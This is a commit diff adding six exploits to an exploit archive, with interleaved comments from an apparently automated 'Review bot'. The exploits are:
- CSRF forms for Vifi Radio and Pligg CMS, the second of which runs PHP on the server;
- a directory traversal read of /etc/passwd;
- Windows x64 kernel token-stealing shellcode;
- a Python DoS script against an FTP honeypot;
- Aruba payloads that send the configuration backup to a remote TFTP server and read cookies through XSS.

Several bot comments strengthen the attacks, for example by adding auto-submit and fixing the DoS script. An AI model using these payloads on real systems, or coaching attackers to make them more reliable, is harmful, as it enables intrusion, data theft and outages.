DB: 2015-08-21
6 new exploits
parent 1ef6c23cb9
commit 6dccd55e18
7 changed files with 251 additions and 1 deletions

@ -10740,7 +10740,7 @@ id,file,description,date,author,platform,type,port
11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0
11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ITSecTeam,php,webapps,0
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (meta)",2010-03-15,blake,windows,remote,0
11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0
11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0
11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,indoushka,php,webapps,0
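Review bot: the two 11742 rows read as a duplicate id only because the rendered diff dropped the -/+ markers; the first is the removed line and the second the added one, and the sole change is the " - " separator inserted before "Pre-Authentication", which brings the description in line with the "Product Version - Title" form of the surrounding 11739-11745 rows. Nothing else in the row changes, so no action is needed here.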
@ -34204,3 +34204,9 @@ id,file,description,date,author,platform,type,port
37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0
37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343
37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
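Review bot: id 37890 is missing between 37889 and 37891; ids in this index are otherwise contiguous, so confirm the gap is deliberate rather than a row dropped from the hunk. 37889 is also filed under platforms/linux/remote with port 0 while its PoC fetches /private/etc/passwd over FTP (the Darwin path layout, and an FTP target); re-check the platform and consider port 21, as the 37893 row already does for its FTP target. The six added rows (37889, 37891-37895) match the "6 new exploits" commit message, and the "59 bytes" claimed for 37895 agrees with the byte stream at the end of that file (16+16+16+11).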

51
platforms/asp/webapps/37892.txt
Executable file
@ -0,0 +1,51 @@
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Vifi Radio v1 - CSRF (Arbitrary Change Password) Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com
[~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker,
Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|~Official Demo : http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
----------------------------------------------------------
PoC
----------------------------------------------------------
<html>
<body>
<form action="http://[TARGET]/yonetim/kullanici-kaydet.asp?tur=g" method="POST">
<input type="hidden" name="rutbe" value="1" />
<input type="hidden" name="djadi" value="0" />
<input type="hidden" name="resim" value="Vifi+Bili%FEim" />
<input type="hidden" name="firma" value="USERNAME" />
<input type="hidden" name="link" value="PASSWORD" />
<input type="hidden" name="sira" value="23" />
<input type="hidden" name="ilet" value="G%D6NDER" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

############################
"Admin Panel: /yonetim "
############################
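Review bot: the PoC form only fires when the victim clicks "Submit request"; there is no auto-submit, so add an onload submit (as 37894.html in this same commit does with <body onload="document.exploit.submit();">) so the CSRF completes without interaction. The advisory also never states its precondition, that the victim must hold an authenticated /yonetim session when the page is opened, and it does not explain why the username and password travel in fields named firma and link, or what rutbe=1 and djadi=0 select; one sentence on each would make the PoC reproducible without guessing. "Tested On" names only the attacker's browser, not the target deployment.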

7
platforms/linux/remote/37889.txt
Executable file
@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected.

ftp://www.example.com/../../../../../../../private/etc/passwd
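Review bot: the title promises both directory traversal and arbitrary file upload, but the only PoC is the traversal read ftp://www.example.com/../../../../../../../private/etc/passwd; no upload request is shown, so either add one or narrow the title to what is actually demonstrated. The text is a SecurityFocus summary: it names 1.9 as vulnerable but gives no vendor advisory or fixed version, and the /private/etc/passwd path is the Darwin layout, which does not fit the platforms/linux/ placement this commit gives the file in files.csv.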

56
platforms/php/webapps/37894.html
Executable file
@ -0,0 +1,56 @@
<!--
# Exploit Title: Pligg CMS Arbitrary Code Execution
# Google Dork: intext:"Made wtih Pligg CMS"
# Date: 2015/8/20
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://pligg.com
# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip
# Version: 2.0.2
# Tested on: Kali , Iceweasel Browser
# CVE : N/A
# Contact : http://twitter.com/0xClay
# Mail : 0xclay@gmail.com
# Site : http://bhunter.ir

# Description :

# Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0
# In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
PHP Codes In {php} {/php} Tags
# A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
Customize Exploit For Your Self .

# Exploit :
-->

<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/pligg-cms/admin/submit_page.php"
method="POST" id="thisform" name="exploit">
<input type="hidden" name="page_title" id="page_title"
size="66"value="Hacked"/>
<input type="hidden" name="page_url" id="page_url" size="66"
value="Hacked"/>
<input type="hidden" name="page_keywords" id="page_keywords" size="66"
value="Hacked"/>
<input type="hidden" name="page_description" id="page_description"
size="66" value="Hacked"/>
<textarea type="hidden"id="textarea-1" name="page_content"
class="form-control page_content" rows="15"> {php}echo '<h1> Hacked </h1>';
{/php} </textarea>
<input type="hidden" name="process" value="new_page" />
<input type="hidden" name="randkey" value="12412532" />
</form>
</body>
</html>

<!--
# After HTML File Executed You Can Access Page In
http://localhost/pligg-cms/page.php?page=Hacked


# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))
-->
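Review bot: the hidden field randkey is hard-coded to 12412532 with no explanation. If admin/submit_page.php validates randkey as a per-session anti-CSRF token, the request is rejected and this PoC cannot work cross-site; if it does not validate it, that missing check is the root cause and the description should say so instead of only describing the {php} tag feature. <textarea type="hidden"> is not valid HTML (textarea has no type attribute), so the page_content box is rendered while the onload submit runs; hide it with style="display:none". The action is hard-coded to http://localhost/pligg-cms/ and must be edited per target, and size="66"value="Hacked" on the page_title input is missing a space.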

56
platforms/win64/shellcode/37895.asm
Executable file
@ -0,0 +1,56 @@
;token stealing shellcode Win 2003 x64
;based on the widely available x86 version
;syntax for NASM
;Author: Csaba Fitzl, @theevilbit

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;important structures and offsets;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;kd> dt -r1 nt!_TEB
; +0x110 SystemReserved1 : [54] Ptr64 Void
;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly

;kd> dt -r1 nt!_KTHREAD
; +0x048 ApcState : _KAPC_STATE
; +0x000 ApcListHead : [2] _LIST_ENTRY
; +0x020 Process : Ptr64 _KPROCESS

;kd> dt -r1 nt!_EPROCESS
; +0x0d8 UniqueProcessId : Ptr64 Void
; +0x0e0 ActiveProcessLinks : _LIST_ENTRY
; +0x000 Flink : Ptr64 _LIST_ENTRY
; +0x008 Blink : Ptr64 _LIST_ENTRY
; +0x160 Token : _EX_FAST_REF
; +0x000 Object : Ptr64 Void
; +0x000 RefCnt : Pos 0, 4 Bits
; +0x000 Value : Uint8B

BITS 64

global start

section .text

start:
mov rax, [gs:0x188] ;Get current ETHREAD in
mov rax, [rax+0x68] ;Get current EPROCESS address
mov rcx, rax ;Copy current EPROCESS address to RCX

find_system_process:
mov rax, [rax+0xe0] ;Next EPROCESS ActiveProcessLinks.Flink
sub rax, 0xe0 ;Go to the beginning of the EPROCESS structure
mov r9 , [rax+0xd8] ;Copy PID to R9
cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)
jnz short find_system_process ;If not SYSTEM got to next EPROCESS

stealing:
mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX
mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address
retn 0x10

;byte stream:
;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
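Review bot: the structure comment attributes the 0x188 offset to nt!_TEB, but mov rax, [gs:0x188] executes in kernel mode, where gs points at the KPCR, not a TEB; the field read is KPCR.Prcb (+0x180) .CurrentThread (+0x008), the current KTHREAD, so the "dt -r1 nt!_TEB" and "+0x078 KTHREAD <----- NOT DOCUMENTED" lines are misleading and should be replaced with the _KPCR/_KPRCB layout, which windbg does show. The inline comment "Get current ETHREAD in" is cut off. The rest is consistent with the header: +0x68 is ApcState (+0x48) plus Process (+0x20), the 0xd8/0xe0/0x160 offsets match the _EPROCESS listing, and the byte stream decodes to exactly these instructions (jnz rel8 0xe6 = -26 spans the 26-byte loop body; 16+16+16+11 = 59 bytes). Two things worth a comment in the file: retn 0x10 hard-codes the stack cleanup of one particular call site, and the copy of Token carries the _EX_FAST_REF RefCnt bits along with the pointer rather than masking them.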

41
platforms/windows/dos/37893.py
Executable file
@ -0,0 +1,41 @@
"""
********************************************************************************************
# Exploit Title: Valhala Honeypot Stack based BOF(Remote DOS)
# Date: 8/20/2015
# Exploit Author: Un_N0n
# Software Developer: Marcos Flavio Araujo Assuncao
# Software Link: http://sourceforge.net/projects/valhalahoneypot/
# Version: 1.8
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open 'honeypot.exe'.
2- Enter the IP of the machine on which this honeypot is running, in this case it is your own
machine i.e 127.0.0.1.
3- Run the script.
~ Software crashes.


[Code to crash honeypot]:
==============================================================
"""
import socket

while True:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("IP_ADDR",21))
    s.send('USER test\r\n')
    s.send('PASS test\r\n')
    s.send('ABOR '+'A'*2000+'\r\n')
    s.recv(1024)
    s.send('ABOR '+'A'*5000+'\r\n')
    s.recv(1024)
    s.send('ABOR '+'A'*6000+'\r\n')
    s.recv(1024)
    s.send('QUIT\r\n')
    s.close()

==============================================================

**********************************************************************************************
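Review bot: the file does not parse as committed: the "====" and "****" trailer lines after s.close() sit outside the closing """ docstring, so Python raises a SyntaxError before the loop ever runs; move them inside the docstring or prefix them with #. Step 2 says to enter 127.0.0.1 in the honeypot, but the script connects to the literal placeholder "IP_ADDR", which must be edited first (or taken from sys.argv); say so in the steps. while True has no exit condition and each s.recv(1024) blocks once the service stops answering after the oversized ABOR, so bound the loop and call s.settimeout(). The str arguments to send() work only under Python 2; Python 3 needs bytes. Finally, the title claims a stack-based overflow but nothing here shows a controlled return address or a register dump; a crash excerpt would back the "Stack-Based Buffer Overflow" wording used for this file in files.csv.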

33
platforms/xml/webapps/37891.txt
Executable file
@ -0,0 +1,33 @@
# Title: Aruba Mobility Controller CSRF And XSS Vulnerabilities
# Date: 08/016/2015
# Author: Itzik Chen (itzik1 at gmail.com)
# Product web page: http://www.arubanetworks.com
# Affected Version: 6.4.2.8
# Tested on: Aruba7240, Ver 6.2.4.8



Summary
================

Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi.
Arube Controller suffers from CSRF and XSS vulnerabilities.



Proof of Concept - CSRF
=========================

192.168.0.1 - Controller IP-Address
172.17.0.1 - Remote TFTP server

<IMG width=1 height=1 SRC="https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz">

That will send the flashbackup configuration file to a remote TFTP server.



Proof of Concept - XSS
=========================

https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
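Review bot: "Affected Version: 6.4.2.8" and "Tested on: Aruba7240, Ver 6.2.4.8" disagree; one of them has transposed digits, and the files.csv row in this commit uses 6.4.2.8, so fix whichever is wrong. The date "08/016/2015" is malformed and "Arube" should read "Aruba". For the CSRF PoC, the advisory should state the precondition that the victim is logged into the controller WebUI on 4343 when the <IMG> loads, and that copyLocalFileToTftpServerWeb.xml accepts the source file, TFTP host and destination name as a single comma-separated GET parameter, which is why an image tag suffices; a one-line note that the exported flashbackup.tar.gz contains the running configuration would make the impact explicit. The XSS PoC breaks out of a </td> and injects an <img onLOAD=...>, so it depends on mode-title being reflected unescaped into switch_mon.html; say so, and name the browser it was confirmed in.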